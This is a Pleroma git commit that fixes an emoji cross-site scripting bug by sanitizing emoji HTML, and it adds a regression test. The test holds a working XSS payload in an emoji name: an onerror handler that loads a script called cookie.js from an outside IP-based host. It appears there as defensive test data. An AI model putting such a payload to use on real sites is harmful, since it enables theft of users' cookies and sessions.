commit: 3370fab1d0af1eb65c6d7f8422129b33ca4c654b
parent: 3c7280934e3bdca8d5a870dc932406ccd9915d64
Author: kaniini <nenolod@gmail.com>
Date: Sun, 2 Sep 2018 00:08:56 +0000
Merge branch 'security/emoji-xss' into 'develop'
formatter: don't add XSS emoji
See merge request pleroma/pleroma!322
Diffstat:
4 files changed, 19 insertions(+), 3 deletions(-)
diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex
@@ -154,6 +154,7 @@ defmodule Pleroma.Formatter do
MediaProxy.url(file)
}' />"
)
+ |> HtmlSanitizeEx.basic_html()
end)
end
diff --git a/test/formatter_test.exs b/test/formatter_test.exs
@@ -189,11 +189,26 @@ defmodule Pleroma.FormatterTest do
text = "I love :moominmamma:"
expected_result =
- "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />"
+ "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />"
assert Formatter.emojify(text) == expected_result
end
+ test "it does not add XSS emoji" do
+ text =
+ "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
+
+ custom_emoji = %{
+ "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
+ "https://placehold.it/1x1"
+ }
+
+ expected_result =
+ "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />"
+
+ assert Formatter.emojify(text, custom_emoji) == expected_result
+ end
+
test "it returns the emoji used in the text" do
text = "I love :moominmamma:"
diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs
@@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do
}
expected_html =
- "<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{
+ "<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{
mentioned_user.ap_id
}\">@shp</a>"
diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs
@@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do
test "A user with emoji in username", %{user: user} do
expected =
- "<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man"
+ "<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man"
user = %{
user
